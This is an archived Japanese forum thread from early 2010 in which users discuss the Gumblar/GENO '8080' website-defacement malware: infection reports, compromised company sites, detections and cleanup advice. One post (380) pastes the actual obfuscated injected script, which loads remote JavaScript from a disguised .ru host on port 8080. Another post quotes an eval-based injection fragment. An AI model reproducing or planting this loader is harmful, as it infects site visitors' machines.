【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】at SEC
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】 - 暇つぶし2ch376:名無しさん@お腹いっぱい。
10/01/06 18:41:26
VirtuaBoxにインストールしたWindows XP SP3でwin.jpgを踏んだら
いつの間にか悪名高いSecurity Toolがインストールされてたw
もう少し遊んでみよう

377:名無しさん@お腹いっぱい。
10/01/06 18:55:34
>>364
avast!はコード自体をwebシールドで弾くから無問題。


378:名無しさん@お腹いっぱい。
10/01/06 19:36:16
Firefox更新きたな

379:名無しさん@お腹いっぱい。
10/01/06 19:39:00
しらん

380:名無しさん@お腹いっぱい。
10/01/06 19:54:30
<script>
/*GNU GPL*/
try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig, ''));
var Zavq7z4z78k = 'Imrp1rhevfo';
U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig, ''));
U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o?u!-$&c!)!o)^$$m)@!^.$(#n&)$i
#(n^#^g@.&@c&$#o@m(.)a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:)
#8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o^&g@&l!#e!.^)c))o@
m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.?^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p)
@s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|\(|&|\^|\)/ig, ''));
U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, ''));
U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l?@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, ''));
document.body.appendChild(U26gcel3nnek);}}
catch(Lpmpa57y1j) {}
</script>
<!--86fa61201e3ca3a075145a1d33d3c209-->

381:sage ◆sage/xLnlI
10/01/06 19:59:26
思いっきり踏みました

382:sage ◆sage/xLnlI
10/01/06 20:05:47
URLリンク(up3.viploader.net)
ソース


どちらさまかWindows7の感染確認方法を教えていただける方はいらっしゃいませんでしょうか

383:名無しさん@お腹いっぱい。
10/01/06 20:06:30
MSに電話白や

384:名無しさん@お腹いっぱい。
10/01/06 20:07:49
>>360
これって、もしかして同じLANから見たら、一人目しか感染しないってことか?

385:名無しさん@お腹いっぱい。
10/01/06 20:18:27
GENOウイルス感染 ローソン
スレリンク(news板)l50


386:名無しさん@お腹いっぱい。
10/01/06 21:22:22
>>382
んなもんないからとっととOSいれなおせ

387:sage ◆sage/xLnlI
10/01/06 21:24:34
>>386
えっ

いまノートン先生が0v3exclv.exeを削除してくれました

388:名無しさん@お腹いっぱい。
10/01/06 21:26:09
やっぱりUACはスルーするのか

389:名無しさん@お腹いっぱい。
10/01/06 21:44:36
>>387
それだけかどうかわからないよ

390:名無しさん@お腹いっぱい。
10/01/06 22:40:20
京王電鉄HPも改ざん被害 ウイルス「ガンブラー」
スレリンク(news板)

391:名無しさん@お腹いっぱい。
10/01/06 22:52:56
>>387
firefoxにはnoscript入れてなかったの?
それとも入れた結果がこれだyoってこと?

392:名無しさん@お腹いっぱい。
10/01/06 23:19:00
UACスルーってマジかよ、何のための暗転だよ

393:名無しさん@お腹いっぱい。
10/01/06 23:19:53
スレリンク(pc板)

394:名無しさん@お腹いっぱい。
10/01/06 23:23:15
海外ではあんま騒いでないよな
なんだこの差は

395:名無しさん@お腹いっぱい。
10/01/06 23:31:25
>>394
"セキュリティツール"の画面が出てくるって騒ぎになっていると聞いたような。
具体的な場所は分からないけど。

396:名無しさん@お腹いっぱい。
10/01/06 23:40:22
これ、もしかして制限ユーザだと全く感染しない?

397:名無しさん@お腹いっぱい。
10/01/07 00:26:16
>>395
Security Toolな。
これも改ざんされたサイトを閲覧して、脆弱性を利用して感染するらしい

398:名無しさん@お腹いっぱい。
10/01/07 00:37:14
サイト www.spacecraft.co.jp/home.html の調査結果
検出されたウイルス(ワーム、スパイウエア)
Trojan-Downloader.JS.Agent.ewh



399:名無しさん@お腹いっぱい。
10/01/07 00:44:56
>>398
そのウィルスはつい最近まで、GDATAの誤検出だとずっと思ってた。

400:名無しさん@お腹いっぱい。
10/01/07 00:46:38
↓↓↓
URLリンク(www)●global2j-education●com/contact
↑↑↑

httpsが、、、

401:名無しさん@お腹いっぱい。
10/01/07 00:49:02
世界中のHTMLのソースコードを検索できたら回避できるのにね
グーグル辺りがやってくれないかな・・・・

402:名無しさん@お腹いっぱい。
10/01/07 00:49:40
FTPがやられるんだからhttpsとか関係ないよ


403:名無しさん@お腹いっぱい。
10/01/07 00:56:28
32 名前: すり鉢(アラバマ州) 投稿日: 2010/01/07(木) 00:45:39.79 ID:RXPRsCkB
p://www●spacecraft●co●jp/home●html
スペースクラフトグループ
神田うの、黒谷友香、栗山千明、岩田さゆり、青山倫子、宇浦冴香、等が所属。

ガンブラーキタ━(゚∀゚)━!!

404:名無しさん@お腹いっぱい。
10/01/07 01:21:53
私は対策ソフトを集めてマルウェアの性能テストなどをしています。
PC雑誌の熟読には自信があります。

あなた方には高度な話になりますが、最近のクラッカーは対策ソフトの
利用を予め想定していて、これを回避するようにいろいろ画策してきます。
今ではアンチウイルスの回避なんて簡単にできるようになっていますし、
Personal Firewallもバイパスできる場合も結構あります。

ここの閲覧者の方々も含めて申しますけど、ここ最近は対策ソフト
回避技術が非常に進歩してきましたので、機関系テストでNo.1の
ソフトだからとかそんな簡単な話ではなくなっています。

私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。

405:名無しさん@お腹いっぱい。
10/01/07 01:27:05
コピペ乙

406:名無しさん@お腹いっぱい。
10/01/07 01:45:25
年明けにgoonetの輸入車ページ見てたらなんか変になったけど大丈夫だったのかな…

407:名無しさん@お腹いっぱい。
10/01/07 01:52:47
民主党サイトが年末から年始にかけて改ざん - 政治的意図なし
カゴヤのホスティングサーバが不正アクセス被害 - ウェブアプリの脆弱性狙われる
関連7サイトが改ざん被害、閲覧でウイルス感染のおそれ - 出版文化社
通販サイトなど運営する3サイトで改ざんが発生 - 岐阜の恵那バッテリー電装


408:名無しさん@お腹いっぱい。
10/01/07 01:59:19
詳しくない者だが、経緯を書いておく。

年末にあるサイトを見たら、瞬間的にいくつ窓が開き、Acrobat6が自動起動。
そして固まる。PCを強制再起動。

再起動すると、Antivirに反応するファイルがゾロゾロすごい数でてくる。名前
はまともらしいが、ほぼすべて削除。いくつかもらしたかも。

次の日に再起動しても、また反応ファイルがぞろぞろ。このあたりで難しいウイルス
かも?と気がついて、とにかく反応するものをすべて削除。TV番組表自動取得
のためのものも、削除してしまった。

その後、スキャンにひっかかるものはテンポラリファイルにある実行ファイル
だけになる。簡単に削除。しかし、siszyd32.exeについては「ファイルが開けない」
という警告のみでる。一旦安心。

409:名無しさん@お腹いっぱい。
10/01/07 02:00:40
Spybotでも、siszyd32.exeはひっかからず。WEBで調べてヤバそうなものだと
判明するが、ファイル本体がどうしても見えない。隠しファイルを表示にしても、
見えない。ただ、存在が指摘されたフォルダで、
siszyd32.exeフォルダを作成するとできないことから、やはり存在する
ことが判明。

ググッてみたけれど、有効策が見つからず。レジストリの中に見つからず、
カスペのフリーツールはデータベースが壊れていると出てつかえなかった。
また、何もしていなくてもCPU使用率が50%になっていることに気がついた。
不審なプログラム、プロセスは自分の知識ではみあたらず。

今日になって、いろいろ削除方法を探してみたところ、セーフモードで起動
するとうまく削除できるらしいので、試してみた。すると、
\プログラム\スタートアップ\siszyd32.exe が何もしなくてもはっきり
見えていたので、削除して再起動したところ、CPU使用率が5%くらいに
落ちた。多分、解決。

今は、siszyd32.exeがCPUをあんなに使用して何をしていたのかが気になって
いる。サイトの運営はしていないが、どうしたらいいものか・・・。ヤフー
とかのパスを変更した方がいいのかな。

410:名無しさん@お腹いっぱい。
10/01/07 02:11:16
>>409
OSのクリーンインストールを薦める
面倒だとは思うが、やっておいたほうが絶対にいいぞ

411:名無しさん@お腹いっぱい。
10/01/07 02:19:00
>410 ありがとう。でも、忙しくて。XPなんで、クリーンインストール
するくらいなら、新しいPCを7で自作しようか検討中。

自分はウイルスやファイアーウォールに詳しくないので、これを機に勉強
しようと思ってます。

今回のウイルスは8,9年くらい前に大流行したウイルスを思い起こさせ
ますね。これを機にセキュリーティーが強化されたはずなのに、こんなに
あっさり感染するとは・・・。WEBを見ただけで感染というのは問題が
ありすぎる。自分の周りはもっとPCに疎い人ばかりなので、明日は職場で
大変だ。

412:名無しさん@お腹いっぱい。
10/01/07 02:23:37
水面下への広がりと応用力を考慮すると、まだ氷山の一角に過ぎず
ネット史上最悪のウィルスとなり得る可能性があるな
事の始まりは去年の春辺りだったか
そこから、表面上に出てくるまで一気に広がり始めた印象

413:名無しさん@お腹いっぱい。
10/01/07 02:25:23
/*GNU GPL*/ 感染サイトを見る

Adobe Readerを最新版に更新してないと
脆弱性をつかれてウィルス実行される

FTPのID、パスがあれば盗まれる
というか盗んで送信するプログラムが常駐される

盗まれたFTPのID、パスでサイトを改ざん

ループ

414:名無しさん@お腹いっぱい。
10/01/07 02:27:22
GNU GPLに関しては、Adobe Readerを入れてなければ感染は防げるとみていいのかな?

415:名無しさん@お腹いっぱい。
10/01/07 02:28:59
Adobe Readerだけじゃないよ
URLリンク(www.so-net.ne.jp)

416:名無しさん@お腹いっぱい。
10/01/07 02:34:46
基本、JSは信頼サイト以外は止めてるが・・・大手の有名サイトでも感染する事があるから100%安全じゃないだろうな
未知のセキュリティホールを突かれない事を祈るばかり

417:名無しさん@お腹いっぱい。
10/01/07 02:39:08
> 未知のセキュリティホールを突かれない事を祈るばかり

それを考えるとHIPS入れておく方がいいのかね

418:名無しさん@お腹いっぱい。
10/01/07 02:41:37
こんなに多くのサイトがやられるんじゃ
市販のウィルスソフトなんか役に立たないと
ばれちゃうなw

419:名無しさん@お腹いっぱい。
10/01/07 02:43:24
ウイルス対策ソフトは検体が無いと対策は取れないからねえ
まあ、これは現実世界のウイルスでも同じだけど

420:名無しさん@お腹いっぱい。
10/01/07 02:48:17
UAC→スルー??
ウィルスソフト→定義更新が間に合わない
各ソフトウェアを最新の状態にしておく→現状ではこれが無難
javascriptを無効化する→ブラウジングに支障が出る

頻繁にブラウジングする立場(様々なオンラインショップで購入したりもする)としては若干怖い

421:名無しさん@お腹いっぱい。
10/01/07 02:56:00
バックアップとれば万が一の時はクリーンインスコで済むから現実のウィルスほど
脅威には感じないけどね(仕事関連は別だけど)

422:名無しさん@お腹いっぱい。
10/01/07 03:08:47
専ブラで2chだけを見るネット生活を送るのがベストか

423:名無しさん@お腹いっぱい。
10/01/07 03:23:21
ガンプラでジオマラでも作ってろチンカスw

424:名無しさん@お腹いっぱい。
10/01/07 03:30:33
そういや専ブラの脆弱性発見ってのも以前あったよな・・・
まあ日本をピンポイントに突いてくる奴しか見つけても使わないだろうけどw
専ブラによっちゃIEの脆弱性の影響受ける奴あるのかな?

>>376,395,397
Security Toolに関してはこれだね
URLリンク(blogs.yahoo.co.jp)
URLリンク(blogs.yahoo.co.jp)

8080のスクリプトがこいつらに変わってるとこもあるとか
8080を操ってる奴らは、裏市場でボットネットみたいな販売方法使って儲け始めたんだろうか?

425:名無しさん@お腹いっぱい。
10/01/07 03:40:01
うちはLive2chだからIEエンジンを使うけどIE自体を凍結しているから実害はないかな

426:名無しさん@お腹いっぱい。
10/01/07 03:43:34
9999999円あなたはどしますか?
URLリンク(117117)●fc2web●com/

これはGNU GPLぐっじょぶw・・で宜しいのかな?

427:名無しさん@お腹いっぱい。
10/01/07 04:57:05
感染すると以下の二つが登録される

C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"


428:名無しさん@お腹いっぱい。
10/01/07 06:50:12
そこは固定じゃない。バイナリはコロコロ変わる。

429:名無しさん@お腹いっぱい。
10/01/07 07:15:07
ころころなんて変わらないよ

430:名無しさん@お腹いっぱい。
10/01/07 07:19:11
モロゾフなどが感染した今流行のやつはそれだろ
新たな違う攻撃なら変わるだろうけど
コロコロ変わったところは確認してない

431:名無しさん@お腹いっぱい。
10/01/07 07:35:14
>>428
どう変わった?

432:名無しさん@お腹いっぱい。
10/01/07 07:39:51
GENOの頃はVistaは安全だったのに、もうVistaでも関係ないんだな。

433:名無しさん@お腹いっぱい。
10/01/07 07:40:00
モロゾフのタイプは>>427であってる
ころころ変わるのは別物

434:名無しさん@お腹いっぱい。
10/01/07 07:40:43
感染しているのはupdateを怠ってる人達だがね

435:名無しさん@お腹いっぱい。
10/01/07 09:08:47
updateを怠ってるなんて出来るの?
終了時に強制的にupdateされない?

436:名無しさん@お腹いっぱい。
10/01/07 09:18:24
flashとかがか
今の段階でそんなこといってたらそら引っかかるわ

437:名無しさん@お腹いっぱい。
10/01/07 09:54:17
>>384
俺もそれ知りたい。

月曜の晩、俺のPCでNOD32が8080系を検知したサイトを、奥さんが別PCで見ちゃったの。ウィスルセキュリティーZEROはスルー。
でも、どんなに調べても感染の形跡がないのさ。
その後、各社(Macfee,NOD2,MSE,Kasper)の全スキャンにも引っかからず、netstat -a で見てももどこにもつなぎに行ってない。
Windows XPは Windows Updateで最新状態だったが、Acrobatは8だったのに。

で、>>356>>360を見て、もしかしてNOD32は改竄されたHTMLの<script>の文字列パターンや .ru:8080 のサイト名ではなく、
その次の .jsファイルのダウンロードの時点で検知・遮断するのかなと。
すると、次に奥さんが別PCで見ても.jsファイルがNOT FOUNDなら感染しなかったのも合点がいくんだなぁ。

いずれにしても早く、明確な感染確認の方法が出てくれればありがたい。
いっそFFFTPをインストールして、自前サイトのID/PWでもセットしておくかなw

438:名無しさん@お腹いっぱい。
10/01/07 11:08:43
Spybot、Ad-Aware、Avast、MSEssentialsの4つをインストール(常駐)+MSの悪意のある~を使ってますが、こういうフリーのソフトで固めてもGumblarは防げないのでしょうか?


439:名無しさん@お腹いっぱい。
10/01/07 11:11:20
だから穴の前のついたてを選んでないで
さっさと穴埋めとけ

440:名無しさん@お腹いっぱい。
10/01/07 11:19:50
今、一番いいセキュリティソフトスレに行こうとしたらAvastがトロイの木馬を発見した
一応未然に防いで削除(移動)出来たようだけど、ほんとに大丈夫なのかな?
たった今1日がかりでWindowsのクリーンインストールしたばっかなんだけど

441:名無しさん@お腹いっぱい。
10/01/07 11:24:53
やっぱ2chは怖いね
どのスレだったかCファイル破壊コードとか書かれていたし

442:名無しさん@お腹いっぱい。
10/01/07 11:24:59
ふーん

443:名無しさん@お腹いっぱい。
10/01/07 11:34:36
>>442のような人間が仕込んでるんだろうなw

444:名無しさん@お腹いっぱい。
10/01/07 11:41:22
また馬鹿キャラプレイしてるのか

445:名無しさん@お腹いっぱい。
10/01/07 11:47:30
cファイル破壊コードって何なのさ?

446:名無しさん@お腹いっぱい。
10/01/07 11:48:09
2chスレ内だけで感染できるなら感染してみろや

447:440
10/01/07 11:53:28
>>446
自分Live2ch使ってるんですが、そのスレ見たらAvastが検出して、その後Avastの履歴見たらLive2chが書かれていました
自分も良く分からないのですが
誤検出ですかね?

448:名無しさん@お腹いっぱい。
10/01/07 11:55:34
どんだけー

449:名無しさん@お腹いっぱい。
10/01/07 11:56:30
検出と感染は違うだろ。
検出に誤検出もなにもない。

450:名無しさん@お腹いっぱい。
10/01/07 11:57:01
2chでJS:Redirector-H [Trj]ならAvastの誤検出

451:名無しさん@お腹いっぱい。
10/01/07 12:01:26
>>449
誤検出はあるだろ

452:名無しさん@お腹いっぱい。
10/01/07 12:02:39
すまん。誤検出はあるな。検出がない。

453:名無しさん@お腹いっぱい。
10/01/07 12:05:02
俺初心者でこのスレ読んで思ったんだけど、2chのスレ見ただけでトロイの木馬って感染するんですか?
今話題のGumblarってのはサイトを見ただけで感染するようですが

454:名無しさん@お腹いっぱい。
10/01/07 12:17:52
誰かここに癌ブラーのソース貼り付けてたよね
うつったかも

455:名無しさん@お腹いっぱい。
10/01/07 12:29:08
今日は釣り日和なんか?

456:名無しさん@お腹いっぱい。
10/01/07 12:32:44
2ちゃんに繋ぐFTPアカ持ってる人が踏んで、このページが書き変えられれば感染するんじゃね?

457:名無しさん@お腹いっぱい。
10/01/07 12:44:51
私は対策ソフトを集めてマルウェアの性能テストなどをしています。
PC雑誌の熟読には自信があります。

私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。


458:名無しさん@お腹いっぱい。
10/01/07 12:47:44
コピペ乙

459:名無しさん@お腹いっぱい。
10/01/07 12:48:13
経験豊富なあなたがお勧めする

 Kaspersky Internet Security 2010

これは、買わないといけないね!

460:名無しさん@お腹いっぱい。
10/01/07 13:04:10
AVGは検出してくれないのか?

461:名無しさん@お腹いっぱい。
10/01/07 13:18:44
俺もAVG使ってるんだけど、どうなのか不安なんだよね

462:名無しさん@お腹いっぱい。
10/01/07 13:30:43
ココで合ってる?

URLリンク(pc11.2ch.net) > GZ > file.htm JS/TrojanDownloader.Agent.NRL トロイの木馬


463:名無しさん@お腹いっぱい。
10/01/07 15:14:14
/*GNU GPL*/とか 呼びにくい
まだ名前ないのか?

464:名無しさん@お腹いっぱい。
10/01/07 15:16:54
JRウイルス

465:名無しさん@お腹いっぱい。
10/01/07 16:37:20
ハウス食品 『 お客様のPCにウィルスを感染させてしまったかも・・・ 』
スレリンク(news板)
>弊社の「採用ホームページ」が第三者による不正アクセスにより改ざんされ、

>2.対象期間
>2009年12月15日 1:00 ~ 2010年1月5日 15:00
ローソンと一緒か

466:名無しさん@お腹いっぱい。
10/01/07 16:53:19
他所は大変だね。
わたしのとこは絶対大丈夫! うぇぇwwwwWw

え~と
どれどれ 

/*GNU GPL*/ ・・・ (°◇°;)

467:名無しさん@お腹いっぱい。
10/01/07 17:17:22
何で新卒採用情報ページばかり?
偶然?

468:名無しさん@お腹いっぱい。
10/01/07 17:22:50
新卒ディレクトリしか入れないFTPアカ持ってるヤツが踏んだんじゃね?

469:名無しさん@お腹いっぱい。
10/01/07 17:23:06
時期的な事情があったりして?

470:名無しさん@お腹いっぱい。
10/01/07 17:25:25
家で更新してんのか

471:名無しさん@お腹いっぱい。
10/01/07 17:31:27
>>447
画像系の直リンにセキュリティソフトが反応しているdけで
専ブラという箱庭世界内ではスレに貼られている有害リンクを直接踏んでWEBブラウザで開かない限りは
120%感染はあり得ません
janeやIE系のlive2chはもちろん、全ての2chブラウザに共通


472:名無しさん@お腹いっぱい。
10/01/07 17:49:02
2chブラウザに脆弱性なしということですか?

473:名無しさん@お腹いっぱい。
10/01/07 17:53:22
いや
あったとしても利用されてない

474:名無しさん@お腹いっぱい。
10/01/07 17:54:46
2chのスレを見るだけなら2ch自体が感染しない限りwebブラウザでも同じ
反応するのはコードのコピペ
後は画像サムネイル機能を持った外部ページからの経由ではこれに反応するかもしれないって程度


475:名無しさん@お腹いっぱい。
10/01/07 17:55:36
ここにコード貼り付けた馬鹿がいるから

476:名無しさん@お腹いっぱい。
10/01/07 19:16:49
コード貼りつけたからって馬鹿とかいうなよ
リンク貼るヤツより遥かにマシ

477:名無しさん@お腹いっぱい。
10/01/07 19:21:30
比べてどうするんだよw
どっちも糞で馬鹿なのには違いない。

478:名無しさん@お腹いっぱい。
10/01/07 19:43:56
>>467-469
某大学のHP陥落が関係していると思われ。


479:名無しさん@お腹いっぱい。
10/01/07 19:49:17
不況のあおりですか。
サイバーテロですね。

480:名無しさん@お腹いっぱい。
10/01/07 20:32:16
どっかでVistaは関係ねーとかかかったらPCぶっ壊れてすぐわかるとか言われてたけど
結局どうなのこのGENOだかGumblarだか言うウィルスって

481:名無しさん@お腹いっぱい。
10/01/07 20:33:00
結局誰も何も分かっていない

482:名無しさん@お腹いっぱい。
10/01/07 20:34:43
無償ツールで「Gumblarウイルス」チェックを ~ セキュアブレインが呼びかけ
セキュアブレインの先端技術研究所の調査によれば、
2009年度第2四半期(2009年7月~9月)と
第3四半期(2009年10月~12月)を比較すると、
「Gumblarウイルス」によるWebサイトの改ざん被害の件数は、
約4倍の上昇となっている。
12月に発見された「Gumblarウイルス」によって
改ざんされたWebサイト336件のうち、127件(37.8%)の被害サイトは、
企業のWebサイトとの情報もある。
URLリンク(www.rbbtoday.com)
途中の文を切ってますがかなり増えてるみたいですね。

483:名無しさん@お腹いっぱい。
10/01/07 20:38:15
>>480
ガンブラーウイルスについての誤った情報にご注意ください。
URLリンク(blogs.yahoo.co.jp)

484:名無しさん@お腹いっぱい。
10/01/07 20:57:31
8080なんて呼んでんのはGENOスレにいるやつだけだろ

485:名無しさん@お腹いっぱい。
10/01/07 21:02:08
Gumblar感染してないか確認する方法は、GENOと同じ?

486:名無しさん@お腹いっぱい。
10/01/07 21:08:03
これって新Gumblar?
URLリンク(break24)●nl/
</head><script language=javascript><!--
~中略~
POF=unescape(f5DJz);eval(POF)})(/&/g);
--></script>
<body>

487:名無しさん@お腹いっぱい。
10/01/07 21:13:49
違うと思う

488:名無しさん@お腹いっぱい。
10/01/07 21:20:26
>>486
それは豚汁

489:名無しさん@お腹いっぱい。
10/01/07 21:23:27
>>484
あんたに聞きたい
なぜ8080と呼称するのをそこまで嫌がるの?
Gumblarと明確に違うものなのだから便宜上8080って呼んでも良いじゃないの

ってかマスコミがGumblarって名で広め過ぎてて各個人ブログもちょっと混乱気味・・・

490:名無しさん@お腹いっぱい。
10/01/07 21:27:15
8080なんて呼んでるやつはごく一部だけって話だろ
ポートじゃわかりにくいし勘違いするやつもいるだろうしな

491:名無しさん@お腹いっぱい。
10/01/07 21:29:23
>>484
早く正式名称決めないとヤバイと思うよ、これ。
今回広範囲に被害が広がったのは、GENOと同じ物だと思って対策してなかった人も多いと思う。
対策方法が違うし、とりあえず8080でいいんじゃないの?

492:名無しさん@お腹いっぱい。
10/01/07 21:32:07
gumblar亜種ってことで良いだろ
くだらねえことでこだわるなよ


493:名無しさん@お腹いっぱい。
10/01/07 21:32:08
>>490
今のところ発見当初から変わってない特徴が8080ポート指定ってとこなんだから、別に問題ないと思うけど?
どんな勘違いするんだ??
スクリプトなり仕込んでくる実行ファイルは変化してるし、「GNU GPL」は「CODE1」に変化した経歴があるし・・・

494:名無しさん@お腹いっぱい。
10/01/07 21:34:22
>>492
Gumblar直系の亜種としてGumblar.xってのがあるんだよ
そこに8080が食い込んできたからこのスレがGENOスレ発祥で出来たんだけど、マスコミがGumblarで統一しちゃったせいで
あっちのスレにも8080の改竄報告がいったりしてる

495:名無しさん@お腹いっぱい。
10/01/07 21:34:50
ru指定か?
ちがったっけ
そうならruでもいいな
ロシアンガンブラーでいいよ

496:名無しさん@お腹いっぱい。
10/01/07 21:35:30
>>494
だからなんだよ
しつけえな
くだらねえ

497:名無しさん@お腹いっぱい。
10/01/07 21:37:51
>>494
別に亜種は複数合っても良いんだよ
似たような種類だし分かりやすくて良いよ
まあ有名どころのベンダーが適当に付けた名前が定着するだろうけど

498:名無しさん@お腹いっぱい。
10/01/07 21:40:16
テンプレで8080系ってなってるだろ
嫌ならGENOスレでやってくれ

499:名無しさん@お腹いっぱい。
10/01/07 21:41:34
単にテンプレ作ったやつが馬鹿だからだろ
8080なんて普通に使うポート
無知なだけ

500:名無しさん@お腹いっぱい。
10/01/07 21:43:38
8080系ってことはガンブラーの8080系って言いたいんだろ?

501:名無しさん@お腹いっぱい。
10/01/07 21:45:16
呼び名なんて分かれば良いんだよ
世間でガンブラーらなそれで良いだろ
間違いとか言うなよ

502:名無しさん@お腹いっぱい。
10/01/07 21:51:14
>世間でガンブラーらなそれで良いだろ
良くないから感染が広がったんじゃないかと

Gumblar8080とかかっこよくね?

503:名無しさん@お腹いっぱい。
10/01/07 21:51:50
分かればGumblarでもGENOでもなんでもいいよ
でも今のこのごちゃ混ぜ状態で何が起こってるかって言ったら、8080で感染したのにGumblarってだけでGENOウイルスチェッカーが
未だに使えると思ってる奴が居たり、初代Gumblar(GENOとよく言われた奴)の感染確認方法で確認できると思ってる奴が居たり・・・

どっかベンダーが改めて名前つけてくれたら良いのに・・・ベンダー共通の名前つけよう云々ってどうなったんだ

504:名無しさん@お腹いっぱい。
10/01/07 21:59:16
しかし目的はなんなのかね
ウェブ改竄の被害を楽しんでるだけかな

505:名無しさん@お腹いっぱい。
10/01/07 22:06:36
>>504
8080で詐欺紛いもやってるみたいだけどね>>424
まあコード書き換えれば感染PCをボットネット化するようなこともできるだろうし、金にしようと思えばどうにでもなるな

506:名無しさん@お腹いっぱい。
10/01/07 22:09:16
GumblarもそうだがゾンビPC化すると
DOS攻撃やらなにやらでサイバーテロも起こせるだろ?
金になるとしてもかなり危険だと思うがな

507:名無しさん@お腹いっぱい。
10/01/07 22:10:35
この手のウィルスって亜種が作りやすいだろうから、なんか切りがないよな

508:名無しさん@お腹いっぱい。
10/01/07 22:23:06
切りがないけど、アンチウイルスソフトじゃ対応が一歩遅い気がする
ブラウザで判定できたらいいのにっておもう

509:名無しさん@お腹いっぱい。
10/01/07 22:28:42
ブラウザで判定する意義が分からん・・・結局ウイルス対策ソフトでやってることと一緒じゃね?
そんなことより、使ってるソフトのアップデートを的確にやって既知の脆弱性を埋める&最新のウイルス対策ソフトの常駐の徹底が
一番効果的かと

510:名無しさん@お腹いっぱい。
10/01/07 22:28:48
ブラウザで判定すると早くなるのか?
そんなこと無いから同じ

511:名無しさん@お腹いっぱい。
10/01/07 22:30:04
もうJavaScript切っとけ

512:名無しさん@お腹いっぱい。
10/01/07 22:39:26
別にJavaScript自体が悪いって訳じゃないけど、ホワイトリスト形式で使った方が賢明な状況だよね
で、この流れでNoScriptの話題に振ると、暴れる粘着が居るという・・・
まあなんだ、IEなら信頼済みサイトゾーンの有効活用、FirefoxならNoScript導入、Operaならサーバーマネージャ使うか
No More Scriptsっていうブックマークレット使うか・・・こんな書き方で良い?w

513:名無しさん@お腹いっぱい。
10/01/07 22:41:28
アップデートの徹底がいいのは当然だけど、(ブラウザに定義をカスタマイズできるようにして)
jsの内容が難読処理されてたら、実行しないとか、中国ロシアのサイトに飛ばす内容は実行しないとか
ウイルスソフトの判定の前にブラウザで判定できたら、2段ガマエになって、よりいいんじゃないかと思っただけ。
ウイルスソフトに任せきりが嫌なんだよ。どこまでちゃんと見てるかわかりづらいから。

514:名無しさん@お腹いっぱい。
10/01/07 22:43:53
ウイルスソフトに任せちゃ駄目だよねw

515:名無しさん@お腹いっぱい。
10/01/07 22:51:24
アドビ製品は強制アップデートでおk

516:名無しさん@お腹いっぱい。
10/01/07 22:51:31
>>513
そんな機能ブラウザに標準搭載したら、正常なサイトまで表示崩れたり、真っ白ってことになりかねんか?
外部の奴がアドオンで作るならまだ現実味があるが、ブラウザベンダー自体が付けるような機能には思えん

そこまで心配なら、真っ新な状態の仮想化環境でブラウジングがお勧め

517:名無しさん@お腹いっぱい。
10/01/07 22:59:57
真っ新なマッシン

518:名無しさん@お腹いっぱい。
10/01/07 23:04:54
>>516
ブラウザベンダーがつけてこそ、そのブラウザの信用やシェアが上がったりしないかな。
まあ現実的ではないと思うけど

519:名無しさん@お腹いっぱい。
10/01/07 23:17:43
>>518
逆に否定意見が結構集まる気がするw
まあ最新バージョンのブラウザはどこもフィッシング対策との名目で何かしらのフィルタリング機能入ってるから、そこに期待するしかないんじゃ
ないかな
と言っても、実際改竄されてるページをブロックできてたり、対応が早いかっていうと・・・

結局は環境を常に最新に、ウイルス対策ソフトも最新に(ただし過信は禁物)ってとこに落ち着く

520:名無しさん@お腹いっぱい。
10/01/07 23:31:10
ウイルスが先かウイルスソフトが先かという命題と同じ
Web改鼠は結果でしかなくて、インターネットの開発者は皆どこかしらの違法結社に属していて
ウイルス漬けにされているという現実が露呈した格好だ

521:名無しさん@お腹いっぱい。
10/01/07 23:40:39
なんだか楽天トラベルおかしい?

522:名無しさん@お腹いっぱい。
10/01/07 23:48:19
アメーバがやられた
ブログパーツを使ったサイトで改ざんされたらしい
流出事件といいこのサイトはだめぽ

523:名無しさん@お腹いっぱい。
10/01/07 23:49:10
ハスクバーナ・ゼノアのHPもGENOに感染してない?
URLリンク(www.zenoah.co.jp)

524:名無しさん@お腹いっぱい。
10/01/07 23:49:24
アメバが駄目なんてずっと前から言われてるよ

525:名無しさん@お腹いっぱい。
10/01/07 23:56:22
>523
ノートン先生に怒られた

526:名無しさん@お腹いっぱい。
10/01/07 23:56:24
>>523

Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません

URL:

URLリンク(www.zenoah.co.jp)

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewh

情報:
23:55:06
Kaspersky Internet Security 2010


527:名無しさん@お腹いっぱい。
10/01/07 23:59:51
> Trojan-Downloader.JS.Agent.ewh
いつものだね

528:名無しさん@お腹いっぱい。
10/01/08 00:00:15
だから>>1ぐらい読めよ・・・・

